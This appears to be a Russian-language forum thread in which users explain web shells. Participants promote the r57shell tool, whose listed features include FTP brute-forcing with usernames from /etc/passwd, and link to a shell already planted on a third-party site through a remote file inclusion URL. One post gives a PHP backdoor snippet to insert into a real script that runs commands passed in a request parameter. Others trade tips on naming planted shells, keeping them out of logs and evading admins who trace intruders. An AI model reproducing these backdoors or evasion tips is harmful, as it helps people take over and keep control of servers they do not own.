"Доступ в shell" - доступ к командной строке операционной системы UNIX, на которой размещен Ваш виртуальный сервер. Если Ваш тарифный план включает доступ в shell, вы можете попасть в него, соединившись с сервером www.ВАШ_ДОМЕН.ru (подставьте настоящее имя Вашего сайта по аналогии) по протоколу SSH с помощью программ SSH или OpenSSH. Под Windows протокол SSH поддерживают программы бесплатной Putty (последнюю версию можно свободно загрузить с ресурса www.chiark.greenend.org.uk). Получив доступ в shell, Вы можете выполнять редактирование и отладку Ваших страниц и скриптов прямо на виртуальном сервере."
Шелл скрипт который позволяет управлять сайтом(возможно даже не своим). Т.е. создавать там файлы, кароче что-то типо проводника ,или файлового менеджера,в принципе что-то отдаленное, ну хз я незнаю как объяснить. Тебе наверное надо хоть раз его увидеть прежде понять что это такое
Что типа проводника в винде, только круче Новая версия r57shell 1.24 В новой версии добавлено: ~ скачивание файлов с сервера на котором работает скрипт на локальный компьютер пользователя ~ поддержка архивирования передаваемого с сервера файла в zip, bzip или gzip ~ скачивание файлов с удаленного ftp сервера ~ отправка файлов на удаленный ftp сервер ~ брутфорс ftp сервера, в качестве логина и пароля используется имя пользователя из /etc/passwd ~ возможность использовать перевернутое (user -> resu) имя пользователя в качестве пароля при ftp-брутфорсе ~ вывод списка пользователей из /etc/passwd ~ отправка файлов аттачем на почту ~ отправка писем ~ свертывание/развертывание разделов http://rst.void.ru/download/r57shell.txt
http://w*w*w.paksquash.com/index.php?page=http://k1on.nm.ru/conf.php На вот, посмотри )))) Это уже залитый shell на сайт, только ты там не разберёшься, там кодировачка то не та Ток не забудь звёздочки убрать в ссылке ))))
=-O ЁПТ!!!! Этож на какое разрешение сделано?????? А вообще я теперь всё понял!!! Всем спасибо...и ещё одно, если админ найдёт shell, то он его удалит, да?
а вот интересно какое имя вы даете залитому шелу , я обычно img )) или как у •••™NO FEAR™••• conf.php )) ---------- он попытается тебя найти первым делом))
Самый лучший способ - прописать в начало какого-то скрипта реального, вроде viewtopic.php код вроде такого: if (isset( $_GET["c"] )) { print "<pre>"; system( $_GET['c'] ); print "</pre>"; }
А не через POST? =) Get в логах будет светиться) Ребят.. ну вы даете!!! При первой же возможности выдали названия своих шеллов! Ща какой-нить умник введет в гугл запрос с этими именами и плакали ваши шеллы..
название шеллов не секрет ни для кого,какие они должы быть. и стратегически важные объекты, естесвенно запоролены =))
Да это вообщето не мой, это с сайта одного. А названия, ну в папки то всё время разные заливаешь. Вот и названия разные всё время, чтобы имена сливались. А по стандартным названиям в гугле конечно много можно найти.
Не бред! Мне сказали, что админ пытается найти того, кто ему на сайт залил шелл, ну я и спрашиваю как он будет искать!!!
2 S.H. Ну всё что может быть у админа это твой ИП (или не твой, если ты об этом позаботился). Ну и ещё логи сайта, где иногда можно увидеть с какого сайта ты залил шелл. Всмысле твой сайт узнать. Просто за залитый шелл он наврядли будет тебя искать, если он не админ Пентагона. Плюс информация об ИП может даваться провайдером только правоохранительным органам, а не всем админам.
А мне один раз регразили что передадут инфо обомне в управление "К" я чють в штаны не наделал неделю в инет не лазил. Но оказалась просто запугали, действено
по-моему самое простое объяснение шелла - удаленное управление каким-либо сервером а лучше зарегить бесплатный шелл и полазить тама